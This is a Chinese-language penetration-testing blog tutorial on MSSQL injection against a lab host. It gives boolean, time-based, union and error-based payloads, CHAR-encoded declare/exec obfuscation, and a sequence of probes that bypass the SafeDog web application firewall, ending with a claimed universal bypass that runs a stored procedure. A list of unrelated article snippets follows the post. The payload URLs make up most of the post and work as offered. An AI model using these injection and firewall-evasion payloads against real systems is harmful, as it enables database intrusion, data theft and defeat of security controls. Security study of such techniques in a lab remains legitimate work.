7Riven
7Riven

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗

1.注入类型

  • 布尔盲注:http://192.168.232.174/Test.aspx?id=1 and ascii(substring((select top 1 name from master..sysdatabases),1,1))>100

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第1张图片

验证如下:

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第2张图片

  • 时间盲注:http://192.168.232.174/test.aspx?id=1;if (ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1)))>1 waitfor delay ‘0:0:5’--+

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第3张图片

验证如下:

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第4张图片

  • 联合注入:http://192.168.232.174/test.aspx?id=1 union select 1,2,3

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第5张图片

注:一般不使用 数字占位,而是null,因为数字占位可能会发生隐式转换

用法有以下几种:

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第6张图片

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第7张图片mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第8张图片

2.简单绕过注入

  • 报错注入类型语法:

                                   CAST( expression AS data_type )

                                   CONVERT(data_type[(length)], expression [, style]

http://192.168.232.174/test.aspx?id=1; select * from admin where id =1 (select CAST(USER as int))

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第9张图片

 http://192.168.232.174/test.aspx?id=1;select * from admin where id =1 (select convert(int,user))

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第10张图片

通过使用declare 函数(声明局部变量的函数),常用来绕过waf对一些关键词的拦截

declare:定义变量            set:设置变量值                     exec:执行变量

http://192.168.232.174/test.aspx/?id=1;declare @a nvarchar(2000) set @a='select convert(int,@@version)' exec(@a) --

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第11张图片

  • 变量类型支持 hex和char类型

http://192.168.232.174/test.aspx/?id=1;declare @a nvarchar(2000) set @a='select convert(int,@@version)' exec(@a) --

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第12张图片

http://192.168.232.174/test.aspx?id=1;declare @s varchar(2000) set @s= CHAR(115) + CHAR(101) + CHAR(108) + CHAR(101) + CHAR(99) + CHAR(116) + CHAR(32) + CHAR(99) + CHAR(111) + CHAR(110) + CHAR(118) + CHAR(101) + CHAR(114) + CHAR(116) + CHAR(40) + CHAR(105) + CHAR(110) + CHAR(116) + CHAR(44) + CHAR(64) + CHAR(64) + CHAR(118) + CHAR(101) + CHAR(114) + CHAR(115) + CHAR(105) + CHAR(111) + CHAR(110) + CHAR(41) exec(@s)--

在网页验证是需要将 +改为%2b,才能成功执行

http://192.168.232.174/Test.aspx?id=1;declare @a varchar(2000) set @a=CHAR(115)%2bCHAR(101)%2bCHAR(108)%2bCHAR(101)%2bCHAR(99)%2bCHAR(116)%2bCHAR(32)%2bCHAR(99)%2bCHAR(111)%2bCHAR(110)%2bCHAR(118)%2bCHAR(101)%2bCHAR(114)%2bCHAR(116)%2bCHAR(40)%2bCHAR(105)%2bCHAR(110)%2bCHAR(116)%2bCHAR(44)%2bCHAR(64)%2bCHAR(64)%2bCHAR(118)%2bCHAR(101)%2bCHAR(114)%2bCHAR(115)%2bCHAR(105)%2bCHAR(111)%2bCHAR(110)%2bCHAR(41) exec(@a)--+

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第13张图片

3.bypass安全狗

测试环境 IIS+ASPX+MSSQL+IIS安全狗4.0

  • 开启安全狗

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第14张图片     mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第15张图片mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第16张图片

  • 简单句报错

http://192.168.232.174/test.aspx?id=1 and                       不拦截

http://192.168.232.174/test.aspx?id=1 and 1                    拦截

http://192.168.232.174/test.aspx?id=1 and -1                   不拦截

http://192.168.232.174/test.aspx?id=1 and -1=-1              不拦截

http://192.168.232.174/test.aspx?id=1 and ~1                   不拦截

http://192.168.232.174/test.aspx?id=1 and ~1=1               拦截

http://192.168.232.174/test.aspx?id=1 and ~1=~1             不拦截

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第17张图片

由上述简单测试可知,安全狗对负数和布尔值不敏感。由此,我们可以根据and爆出一些基本信息如下

http://192.168.232.174/test.aspx?id=1 and @@version>~1

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第18张图片

接下来,可以利用它的这些特性爆表名

http://192.168.232.174/test.aspx?id=1 and ~1=(select top 1 name from sysobjects where xtype='u' and name !=’name’);--   拦截

http://192.168.232.174/test.aspx?id=1 and ~1=(select top 1 name from);--                                               不拦截

http://192.168.232.174/test.aspx?id=1  and ~1=(select top 1 name from 1);--                                            拦截

http://192.168.232.174/test.aspx?id=1 and ~1=(select top 1 name from a);--                                             拦截

http://192.168.232.174/test.aspx?id=1 and ~1=(select top 1 name from !);--                                              不拦截

观察上述情况可知,安全狗对于from后面字符型或者整型进行拦截,试图采取符号包裹进行绕过。

http://192.168.232.174/test.aspx?id=1 and ~1=(select top 1 name from[sysobjects]);--   成功绕过!

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第19张图片

接着往后加入where语句,继续测试

and ~1=(select top 1 name from[sysobjects] where xtype='u');--          拦截

and ~1=(select top 1 name from[sysobjects] where xtype=);--             不拦截

上述可知,可以试着采用char和hex编码编辑表名

http://192.168.232.174/test.aspx?id=1%20and ~1=(select top 1 name from[sysobjects] where xtype=0x75);--

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第20张图片

另外,爆其他的表名 测试发现也是安全狗拦截引号字符,可以用相同的方法绕过即可。

  • 联合(union)  bypass

http://192.168.232.174/test.aspx?id=1 union                         不拦截

http://192.168.232.174/test.aspx?id=1 union select               拦截

http://192.168.232.174/test.aspx?id=1 unionselect                拦截

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第21张图片

尝试注释绕过:

http://192.168.232.174/test.aspx?id=1 union/*select*/                         不拦截

http://192.168.232.174/test.aspx?id=1 union/*!select*/                        拦截

http://192.168.232.174/test.aspx?id=1 union/*!1select*/                      不拦截

尝试闭合绕过:

http://192.168.232.174/test.aspx?id=1%20union/*!1*/*select--*/     成功绕过!

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第22张图片

此时,构造payload

http://192.168.232.174/test.aspx?id=1 union/*!1*/*select null,name,null from [admin]--*/

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第23张图片

虽然成功绕过,但是语法上有报错,有兴趣可以多尝试一下,将语法错误解决。

  • 此外,还有注释+换行进行绕过

http://192.168.232.174/test.aspx?id=1--/*%0aif (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--%20*/

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第24张图片

  • 储存过程,万能bypass语句,里面任何代码都可以绕过安全狗

http://192.168.232.174/test.aspx?id=1--/*exec xp_create_subdir 'c:\text'-- */

mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗_第25张图片

你可能感兴趣的:(渗透学习,mssql注入类型举例,bypass安全狗,mssql简单绕过,mssql注入小结)

  • embed 标签怎么嵌入pdf_如何在网页中嵌入PDF文件 weixin_39822443 embed标签怎么嵌入pdf
    如何在网页中嵌入PDF文件编辑:oa161办公商城您想要到包括代码嵌入到PDFfile.2Type,打开的对象标记,它看起来像这样:<object3Insert的type属性的说明1Locate的位置在您的网页的代码。您的文件类型是PDF。因此,您的代码将看起来像这样:=“application/pdf上”4指定的文件名。要做到这一点,类型:数据=“NAMEofFILE.pdf”地方那句“NA
  • FIN41920 Sustainable Finance 后端
    FIN41920SustainableFinanceGroupProject2025ThepurposeofthisprojectistoevaluatetheabilityofapplyingUStoxicemissiondataandaccountingdatatoanalysetheeffectoftoxicemissionsonfirms’financialperformance.Here
  • COMP 5076 Problem Solving in the Digital Age 后端
    COMP5076ProblemSolvingintheDigitalAgeAssignment1–Wizard-of-OzPaperPrototypeUniSASTEMTheUniversityofSouthAustralia2025SP2Warning:ThismaterialhasbeenreproducedandcommunicatedtoyoubyoronbehalfoftheUniver
  • 如何在 Vue 项目中实现动态组件加载,有什么应用场景? 前端大白话 大白话前端八股vue.jsjavascript前端
    大白话如何在Vue项目中实现动态组件加载,有什么应用场景?什么是动态组件加载在Vue项目里,动态组件加载就是能够在程序运行时动态地决定要渲染哪个组件。打个比方,就像你去餐馆点菜,不同的时间你可能想吃不同的菜,动态组件加载就好比你可以随时更换菜单上的菜品,而不需要重新做一份新菜单。实现动态组件加载的步骤1.创建不同的组件首先,你得有几个不同的组件,就像餐馆里有不同的菜品一样。下面是三个简单的组件示例
  • C/C++学习路线概述 DustWind丶 C/C++c++
    根据如下视频和文章总结:想做C语言/C++开发?这些才是你该学的东西!C语言/C++直通企业级开发的详细学习路线节选:肝了半个月,我整理出了这篇嵌入式开发学习学习路线+知识点梳理目录1C/C++学习概述1.1C语言的基础知识1.2C++的基础知识2C/C++编程学习四大件2.1数据结构和算法2.2操作系统2.3计算机网络2.3.1计算机网络分层2.3.2典型协议(以TCP/IP四层模型举例)2.4
  • golang-嵌套结构体 lmryBC49 golang开发语言后端
    结构体嵌套golang中没有类,他通过结构体来实现其他编程语言中类的相关功能。具名结构体基本语法基本语法golang的结构体嵌套特别简单。type结构体类型1struct{字段类型1字段类型2}//这样就实现了结构体的嵌套type结构体类型2struct{字段类型1字段类型2字段结构体类型1}举例packagestruct_knowledgeimport"fmt"typeWorkerstruct{
  • golang-方法 lmryBC49 golang开发语言后端
    方法概述方法是给类型增加的,通过类型实例.方法名()调用。例如我们用自定义类型保存了整数,我们想给该类型的变量都增加一个方法可以直接判断该数是不是奇数。packagemethod_knowledgeimport"fmt"//案例1:给Myint自定义类型添加奇数判断方法typeMyintintfunc(aMyint)IsOdd(){if(a%2==0){fmt.Println("a不是奇数")}e
  • 1252. 奇数值单元格的数目 / 剑指 Offer II 113. 课程顺序 彼淇梁 力扣刷题记录算法leetcodejava刷题记录
    1252.奇数值单元格的数目【简单题】【每日一题】思路:【模拟】定义行数组rows和列数组cols,用来记录当前行的+1次数和当前列的+1次数,遍历indices数组用来给rows和cols赋值。定义奇数值单元格数目为ans,初值为0。那么遍历矩阵每个位置,如果当前行和当前列的+1次数和是奇数,则ans+1代码:classSolution{publicintoddCells(intm,intn,i
  • LoadRunner 11 性能测试全面教程 金融先生-Frank
    本文还有配套的精品资源,点击获取简介:LoadRunner11(LR11)是HP开发的一款企业级性能测试工具,支持多应用程序类型的负载测试,用于性能评估、瓶颈识别和系统优化。教程详细介绍LR11的组件功能、脚本开发、场景设置、测试执行、结果分析、性能指标监测、故障诊断以及自动化测试等,提供从初级到高级的完整学习路径。1.LoadRunner11(LR11)功能概述LoadRunner11(LR11
  • Android studio之编译提示Could not find :umeng-asms-v1.2.1:. 码莎拉蒂 . AndriodstudioAndroidCouldnotfind导入正确的aar文件umeng-asms-v1flatDir
    1、问题Couldnotdeterminethedependenciesoftask':app:compileDebugJavaWithJavac'.>Couldnotresolvealltaskdependenciesforconfiguration':app:debugCompileClasspath'.>Couldnotfind:umeng-asms-v1.2.1:.Requiredby:p
  • 剑指 Offer II 061. 和最小的 k 个数对 炫云云 大数据算法和数据结构leetcode算法python
    剑指OfferII061.和最小的k个数对给定两个以升序排列的整数数组nums1和nums2,以及一个整数k。定义一对值(u,v),其中第一个元素来自nums1,第二个元素来自nums2。请找到和最小的k个数对(u1,v1),(u2,v2)…(uk,vk)。示例1:输入:nums1=[1,7,11],nums2=[2,4,6],k=3输出:[1,2],[1,4],[1,6]解释:返回序列中的前3对
  • 使用大语言模型API在AI应用中的实现 qq_37836323 人工智能语言模型自然语言处理python
    随着人工智能技术的迅速发展,大语言模型(LLM)在自然语言处理(NLP)领域的应用越来越广泛。本文将介绍如何使用大语言模型API来实现一些基础的AI应用,并提供一个简单的demo代码,帮助大家更好地理解和使用这些技术。大语言模型API简介大语言模型(如GPT-4)能够理解和生成类似人类的文本。这些模型可以应用于各种任务,包括文本生成、语言翻译、情感分析、对话系统等。为了方便国内用户访问这些强大的模
  • MySQL学习路线 蜡笔小新星 MySQL数据库mysql学习经验分享
    本专栏纯干货订阅专栏不迷路以下是一个详细的MySQL学习路线,适合从初学者到中高级用户的逐步学习。整个路线分为几个阶段,每个阶段包含了必要的知识点和学习材料。第一阶段:基础知识(1-2周)目标:了解数据库的基本概念,熟悉MySQL的基本用法。学习内容:数据库基础什么是数据库、数据库管理系统(DBMS)数据库的类型(关系型数据库与非关系型数据库)SQL(结构化查询语言)概述MySQL入门MySQL的
  • 用python执行js代码:PyExecJS库详解 数据知道 2025年爬虫和逆向教程pythonjavascript爬虫数据采集nodejs
    更多内容请见:爬虫和逆向教程-专栏介绍和目录文章目录1.介绍和安装1.1PyExecJS介绍1.2安装JavaScript运行时1.3安装PyExecJS2.PyExecJS的基本使用2.1执行简单的JavaScript代码2.2使用外部JavaScript文件2.3先编译、后调用2.4传递参数和获取返回值3.PyExecJS的高级功能3.1指定JavaScript运行时3.2处理异步JavaSc
  • 【 <二> 丹方改良:Spring 时代的 JavaWeb】之 Spring Boot 中的 RESTful API 设计:从上手到骨折 Foyo Designer springspringbootrestfulSpringMVCAsyncCrossOrigin
    点击此处查看合集https://blog.csdn.net/foyodesigner/category_12907601.html?fromshare=blogcolumn&sharetype=blogcolumn&sharerId=12907601&sharerefer=PC&sharesource=FoyoDesigner&sharefrom=from_link一、开篇整活儿咱今儿个唠唠Spr
  • 【NLP】 API在大语言模型中的应用 Nerous_ 深度学习自然语言处理语言模型人工智能
    大语言模型(LargeLanguageModels,LLMs)通过API(应用程序接口)为开发者提供了便捷的调用方式,使其能够快速集成自然语言处理能力到各类应用中。以下是API在LLM中的核心应用场景及技术实现细节:一、核心应用场景自然语言理解与生成应用示例:智能客服:解析用户问题并生成回复(如ChatGPTAPI)。内容创作:自动生成文章、广告文案或代码(如OpenAI的GPT-4)。技术实现:
  • (LeetCode 每日一题) 2680. 最大或值(前缀和、位运算) 岁忧 LeetCodejava版刷题leetcode算法职场和发展javac++
    题目:2680.最大或值思路:在多个数上乘2,不如都在一个数上乘。这样只需要枚举每一个数乘k次2,也就是位运算移位k次。通过前缀和可以预处理出左右俩边的或值,实际上只需要预处理出一边的,另外一边在遍历时可得出。时间复杂度0(n)classSolution{public:longlongmaximumOr(vector&nums,intk){intn=nums.size();vectorv(n);f
  • 基于ssm的林木生长管理系统 AI天才研究院 DeepSeekR1&大数据AI人工智能大模型AI大模型企业级应用开发实战计算计算科学神经计算深度学习神经网络大数据人工智能大型语言模型AIAGILLMJavaPython架构设计AgentRPA
    1.背景介绍在我们的日常生活中,森林资源的管理和保护是一个重要的环保议题。为了有效地管理森林资源,许多科研机构和政府部门正在寻找更高效的技术手段。这就是我们今天要讨论的主题:基于SSM的林木生长管理系统。SSM是SpringMVC、Spring和MyBatis三个开源框架的缩写。这三个框架在Java开发中被广泛使用,因为它们可以提供一种简单、高效的方式来开发和维护复杂的Web应用程序。在这篇文章中
  • 数据结构、图论---数组模拟单链表 邻接表 wow_awsl_qwq 数据结构数据结构图论链表
    数组模拟链表或者所谓的邻接表,实际上都是静态链表,以数组下标模拟模拟内存地址,使得可以一开始就给数组分配好连续的一大片空间,而使用中的“内存分配”实际上就是变成了简单的idx++比赛中使用静态链表代替指针型链可以减少内存分配带来的时间消耗,并且使用方式也比较简单比赛中的单链表或者邻接表也可以用vector实现,达到动态内存分配的效果,其实就是类似于指针链表,不过使用方式也比较简单直观比如图论模型:
  • 5-1 使用ECharts将MySQL数据库中的数据可视化 上课的牛马 实训大数据
    方法一:使用PythonFlask框架搭建API对于技术小白来说,使用ECharts将MySQL数据库中的数据可视化需要分步骤完成。以下是详细的实现流程:一、技术架构‌后端服务‌:使用PythonFlask框架搭建API(简单易学,适合新手)数据库连接‌:通过Python的pymysql库连接MySQL前端可视化‌:HTML+JavaScript+ECharts数据流向‌:MySQL数据库→Pyt
  • 绕过 reCAPTCHA V2/V3:Python、Selenium 指南 qq_33253945 pythonseleniumjavascript网络爬虫爬虫算法
    前言验证码(CAPTCHA)技术已经存在许多年,尽管它的有效性一直备受争议,但许多网站仍然依赖它来保护资源。尤其是Google推出的reCAPTCHA系列,一直是验证码领域的佼佼者。本文将详细介绍如何绕过reCAPTCHAV2和V3,并提供实用的代码示例。详情请见:解决验证码recaptcha、cloudflare、incapsula1.什么是reCAPTCHA?reCAPTCHA是Google推
  • 【DNN量化工具】QKeras 工具简介 kanhao100 笔记dnn人工智能神经网络
    QKeras工具简介QKeras是一个用于量化深度学习模型的Keras扩展库,旨在使深度学习模型的量化(即将模型的浮点权重转换为低精度格式)变得简单而高效。QKeras主要目标是优化模型的存储和推理速度,特别适用于需要在资源受限的设备(如移动设备和嵌入式系统)上运行深度学习模型的场景。QKeras的主要特点量化支持:QKeras提供了对不同类型量化的支持,包括权重量化和激活量化。用户可以根据需求选
  • DeepSeek来袭!低代码+AI竟让程序员摸鱼接私单月入5W! 工业甲酰苯胺 低代码人工智能
    目录一、引言:开启低代码+AI新时代二、DeepSeek与低代码、AI的关联(一)DeepSeek简介(二)低代码开发概述(三)AI赋能低代码三、低代码+AI开启私单赚钱大门(一)成功案例剖析(二)私单项目类型(三)赚钱模式解析四、实战:利用DeepSeek接私单(一)工具准备与环境搭建(二)需求分析与项目规划(三)低代码开发实战(四)AI技术融合应用(五)项目测试与交付五、挑战与应对策略(一)技
  • 亿级分布式系统架构演进实战(三)- 横向扩展(数据库读写分离) power-辰南 java技术架构师成长专栏数据库mysql分布式系统springcloud架构设计
    亿级分布式系统架构演进实战(一)-总体概要亿级分布式系统架构演进实战(二)-横向扩展(服务无状态化)核心目标分散数据库压力,提升读性能1.数据库架构设计数据库由原理的单实例变成主从模式,主主要负责写,从负责读。1.1主从角色定义节点类型数据流向核心职责主库读写(Write)处理事务性写操作(INSERT/UPDATE/DELETE)/部分读从库只读(Read)承担查询请求(SELECT),支持水平
  • 3分钟带你了解Vue3的nextTick() 嫣嫣细语 vue.js前端javascriptvue.jsjavascript前端
    前言Vue实现响应式并不是数据发生变化之后DOM立即变化,而是按一定的策略进行DOM的更新。简单来说,Vue在修改数据后,视图不会立刻更新,而是等同一事件循环中的所有数据变化完成之后,再统一进行视图更新,nextTick()方法就会在这样的DOM更新循环结束后调用指定的函数。概念在Vue3中nextTick()方法的行为和Vue2中基本相似,但它进行了一些优化,以提高性能和稳定性。nextTick
  • 数组模拟邻接表 #图论 旧物有情 数据结构图论数据结构
    文章目录为什么要用数组来模拟邻接表存储思路遍历思路树是特殊的图,因此邻接表可以存储图和树两种数据结构。为什么要用数组来模拟邻接表在算法设计当中,利用数组来代替结构体模拟各种数据结构会更加简单。存储思路给定如下数据,我们可以构造如下的一个邻接表请看代码/**idx:索引,代表数组哪个位置,是否连续不重要,因为我们的存储是链式的。h[idx]:顶点表,下标idx代表是哪个顶点,初始值全部为-1,代表没
  • 亿级分布式系统架构演进实战(五)- 横向扩展(缓存策略设计) power-辰南 java技术架构师成长专栏多级缓存策略springcloud分布式系统缓存一致性高并发缓存问题解决方案
    亿级分布式系统架构演进实战(一)-总体概要亿级分布式系统架构演进实战(二)-横向扩展(服务无状态化)亿级分布式系统架构演进实战(三)-横向扩展(数据库读写分离)亿级分布式系统架构演进实战(四)-横向扩展(负载均衡与弹性伸缩)核心目标降低数据库读压力,提升响应速度一、多级缓存架构客户端CDN/浏览器缓存本地应用缓存分布式缓存数据库缓冲池1.1客户端缓存缓存数据类型:•静态资源(JS/CSS/图片)•
  • LeetCode 热题 100_跳跃游戏 II(79_45_中等_C++)(贪心算法) Dream it possible! LeetCode热题100leetcodec++贪心算法算法
    LeetCode热题100_跳跃游戏II(79_45)题目描述:输入输出样例:题解:解题思路:思路一(贪心选择):代码实现代码实现(思路一(贪心算法)):以思路一为例进行调试题目描述:给定一个长度为n的0索引整数数组nums。初始位置为nums[0]。每个元素nums[i]表示从索引i向后跳转的最大长度。换句话说,如果你在nums[i]处,你可以跳转到任意nums[i+j]处:0&nums){in
  • 用Python实现SFM 薄辉 pythonopencv计算机视觉人工智能图像处理
    SFM(结构化光流法)是一种用于解决三维重建问题的方法,它可以根据许多二维图像和它们之间的相对位置,估计出三维场景的深度和摄像机的姿态。在Python中,你可以使用OpenCV库来实现SFM。下面是一个简单的例子,展示了如何使用OpenCV库的cv2.sfm_create函数来实现SFM:importcv2#读入图像,存入列表images中images=[]foriinrange(1,11):im
  • mysql修改表中所有字段不许为空_如何用SQL语句修改一个表的字段,让它不能为空... Asama浅间
    展开全部ALTERTABLE表ALTERCOLUMN[字段名]字段类型NOTNULLSQL语句1、基32313133353236313431303231363533e78988e69d8331333365643661本介绍:sql语句是对数据库进行操作的一种语言。结构化查询语言(StructuredQueryLanguage)简称SQL,结构化查询语言是一种数据库查询和程序设计语言,用于存取数据以
  • Java序列化进阶篇 g21121 java序列化
            1.transient         类一旦实现了Serializable 接口即被声明为可序列化,然而某些情况下并不是所有的属性都需要序列化,想要人为的去阻止这些属性被序列化,就需要用到transient 关键字。
  • escape()、encodeURI()、encodeURIComponent()区别详解 aigo JavaScriptWeb
    原文:http://blog.sina.com.cn/s/blog_4586764e0101khi0.html   JavaScript中有三个可以对字符串编码的函数,分别是: escape,encodeURI,encodeURIComponent,相应3个解码函数:,decodeURI,decodeURIComponent 。 下面简单介绍一下它们的区别 1 escape()函
  • ArcgisEngine实现对地图的放大、缩小和平移 Cb123456 添加矢量数据对地图的放大、缩小和平移Engine
    ArcgisEngine实现对地图的放大、缩小和平移:  个人觉得是平移,不过网上的都是漫游,通俗的说就是把一个地图对象从一边拉到另一边而已。就看人说话吧.  具体实现: 一、引入命名空间    using ESRI.ArcGIS.Geometry;    using ESRI.ArcGIS.Controls; 二、代码实现.
  • Java集合框架概述 天子之骄 Java集合框架概述
       集合框架 集合框架可以理解为一个容器,该容器主要指映射(map)、集合(set)、数组(array)和列表(list)等抽象数据结构。 从本质上来说,Java集合框架的主要组成是用来操作对象的接口。不同接口描述不同的数据类型。   简单介绍:   Collection接口是最基本的接口,它定义了List和Set,List又定义了LinkLi
  • 旗正4.0页面跳转传值问题 何必如此 javajsp
    跳转和成功提示 a)        成功字段非空forward 成功字段非空forward,不会弹出成功字段,为jsp转发,页面能超链接传值,传输变量时需要拼接。接拼接方式list.jsp?test="+strweightUnit+"或list.jsp?test="+weightUnit+&qu
  • 全网唯一:移动互联网服务器端开发课程 cocos2d-x小菜 web开发移动开发移动端开发移动互联程序员
        移动互联网时代来了!     App市场爆发式增长为Web开发程序员带来新一轮机遇,近两年新增创业者,几乎全部选择了移动互联网项目!传统互联网企业中超过98%的门户网站已经或者正在从单一的网站入口转向PC、手机、Pad、智能电视等多端全平台兼容体系。据统计,AppStore中超过85%的App项目都选择了PHP作为后端程
  • Log4J通用配置|注意问题 笔记 7454103 DAOapachetomcatlog4jWeb
    关于日志的等级 那些去 百度就知道了! 这几天 要搭个新框架  配置了 日志 记下来 !做个备忘! #这里定义能显示到的最低级别,若定义到INFO级别,则看不到DEBUG级别的信息了~! log4j.rootLogger=INFO,allLog # DAO层 log记录到dao.log 控制台 和 总日志文件 log4j.logger.DAO=INFO,dao,C
  • SQLServer TCP/IP 连接失败问题 ---SQL Server Configuration Manager darkranger sqlcwindowsSQL ServerXP
    当你安装完之后,连接数据库的时候可能会发现你的TCP/IP 没有启动.. 发现需要启动客户端协议 : TCP/IP  需要打开 SQL Server Configuration Manager... 却发现无法打开 SQL Server Configuration Manager..?? 解决方法:  C:\WINDOWS\system32目录搜索framedyn.
  • [置顶] 做有中国特色的程序员 aijuans 程序员
    从出版业说起 网络作品排到靠前的,都不会太难看,一般人不爱看某部作品也是因为不喜欢这个类型,而此人也不会全不喜欢这些网络作品。究其原因,是因为网络作品都是让人先白看的,看的好了才出了头。而纸质作品就不一定了,排行榜靠前的,有好作品,也有垃圾。 许多大牛都是写了博客,后来出了书。这些书也都不次,可能有人让为不好,是因为技术书不像小说,小说在读故事,技术书是在学知识或温习知识,有些技术书读得可
  • document.domain 跨域问题 avords document
    document.domain用来得到当前网页的域名。比如在地址栏里输入:javascript:alert(document.domain); //www.315ta.com我们也可以给document.domain属性赋值,不过是有限制的,你只能赋成当前的域名或者基础域名。比如:javascript:alert(document.domain = "315ta.com");
  • 关于管理软件的一些思考 houxinyou 管理
    工作好多看年了,一直在做管理软件,不知道是我最开始做的时候产生了一些惯性的思维,还是现在接触的管理软件水平有所下降.换过好多年公司,越来越感觉现在的管理软件做的越来越乱. 在我看来,管理软件不论是以前的结构化编程,还是现在的面向对象编程,不管是CS模式,还是BS模式.模块的划分是很重要的.当然,模块的划分有很多种方式.我只是以我自己的划分方式来说一下. 做为管理软件,就像现在讲究MVC这
  • NoSQL数据库之Redis数据库管理(String类型和hash类型) bijian1013 redis数据库NoSQL
    一.Redis的数据类型 1.String类型及操作         String是最简单的类型,一个key对应一个value,string类型是二进制安全的。Redis的string可以包含任何数据,比如jpg图片或者序列化的对象。         Set方法:设置key对应的值为string类型的value
  • Tomcat 一些技巧 征客丶 javatomcatdos
    以下操作都是在windows 环境下 一、Tomcat 启动时配置 JAVA_HOME 在 tomcat 安装目录,bin 文件夹下的 catalina.bat 或 setclasspath.bat 中添加 set JAVA_HOME=JAVA 安装目录 set JRE_HOME=JAVA 安装目录/jre 即可; 二、查看Tomcat 版本 在 tomcat 安装目
  • 【Spark七十二】Spark的日志配置 bit1129 spark
    在测试Spark Streaming时,大量的日志显示到控制台,影响了Spark Streaming程序代码的输出结果的查看(代码中通过println将输出打印到控制台上),可以通过修改Spark的日志配置的方式,不让Spark Streaming把它的日志显示在console   在Spark的conf目录下,把log4j.properties.template修改为log4j.p
  • Haskell版冒泡排序 bookjovi 冒泡排序haskell
    面试的时候问的比较多的算法题要么是binary search,要么是冒泡排序,真的不想用写C写冒泡排序了,贴上个Haskell版的,思维简单,代码简单,下次谁要是再要我用C写冒泡排序,直接上个haskell版的,让他自己去理解吧。     sort [] = [] sort [x] = [x] sort (x:x1:xs) | x>x1 = x1:so
  • java 路径 配置文件读取 bro_feng java
    这几天做一个项目,关于路径做如下笔记,有需要供参考。 取工程内的文件,一般都要用相对路径,这个自然不用多说。 在src统计目录建配置文件目录res,在res中放入配置文件。 读取文件使用方式: 1. MyTest.class.getResourceAsStream("/res/xx.properties") 2. properties.load(MyTest.
  • 读《研磨设计模式》-代码笔记-简单工厂模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ package design.pattern; /* * 个人理解:简单工厂模式就是IOC; * 客户端要用到某一对象,本来是由客户创建的,现在改成由工厂创建,客户直接取就好了 */ interface IProduct {
  • SVN与JIRA的关联 chenyu19891124 SVN
    SVN与JIRA的关联一直都没能装成功,今天凝聚心思花了一天时间整合好了。下面是自己整理的步骤: 一、搭建好SVN环境,尤其是要把SVN的服务注册成系统服务 二、装好JIRA,自己用是jira-4.3.4破解版 三、下载SVN与JIRA的插件并解压,然后拷贝插件包下lib包里的三个jar,放到Atlassian\JIRA 4.3.4\atlassian-jira\WEB-INF\lib下,再
  • JWFDv0.96 最新设计思路 comsci 数据结构算法工作企业应用公告
                       随着工作流技术的发展,工作流产品的应用范围也不断的在扩展,开始进入了像金融行业(我已经看到国有四大商业银行的工作流产品招标公告了),实时生产控制和其它比较重要的工程领域,而
  • vi 保存复制内容格式粘贴 daizj vi粘贴复制保存原格式不变形
        vi是linux中非常好用的文本编辑工具,功能强大无比,但对于复制带有缩进格式的内容时,粘贴的时候内容错位很严重,不会按照复制时的格式排版,vi能不能在粘贴时,按复制进的格式进行粘贴呢? 答案是肯定的,vi有一个很强大的命令可以实现此功能 。     在命令模式输入:set paste,则进入paste模式,这样再进行粘贴时
  • shell脚本运行时报错误:/bin/bash^M: bad interpreter 的解决办法 dongwei_6688 shell脚本
    出现原因:windows上写的脚本,直接拷贝到linux系统上运行由于格式不兼容导致 解决办法: 1. 比如文件名为myshell.sh,vim myshell.sh 2. 执行vim中的命令 : set ff?查看文件格式,如果显示fileformat=dos,证明文件格式有问题 3. 执行vim中的命令 :set fileformat=unix 将文件格式改过来就可以了,然后:w
  • 高一上学期难记忆单词 dcj3sjt126com wordenglish
    honest 诚实的;正直的 argue 争论 classical 古典的 hammer 锤子 share  分享;共有 sorrow 悲哀;悲痛 adventure 冒险 error 错误;差错 closet 壁橱;储藏室 pronounce 发音;宣告 repeat 重做;重复 majority 大多数;大半   native 本国的,本地的,本国
  • hibernate查询返回DTO对象,DTO封装了多个pojo对象的属性 frankco POJOhibernate查询DTO
          DTO-数据传输对象;pojo-最纯粹的java对象与数据库中的表一一对应。       简单讲:DTO起到业务数据的传递作用,pojo则与持久层数据库打交道。         有时候我们需要查询返回DTO对象,因为DTO
  • Partition List hcx2013 partition
    Given a linked list and a value x, partition it such that all nodes less than x come before nodes greater than or equal to x. You should preserve the original relative order of th
  • Spring MVC测试框架详解——客户端测试 jinnianshilongnian
    上一篇《Spring MVC测试框架详解——服务端测试》已经介绍了服务端测试,接下来再看看如果测试Rest客户端,对于客户端测试以前经常使用的方法是启动一个内嵌的jetty/tomcat容器,然后发送真实的请求到相应的控制器;这种方式的缺点就是速度慢;自Spring 3.2开始提供了对RestTemplate的模拟服务器测试方式,也就是说使用RestTemplate测试时无须启动服务器,而是模拟一
  • 关于推荐个人观点 liyonghui160com 推荐系统关于推荐个人观点
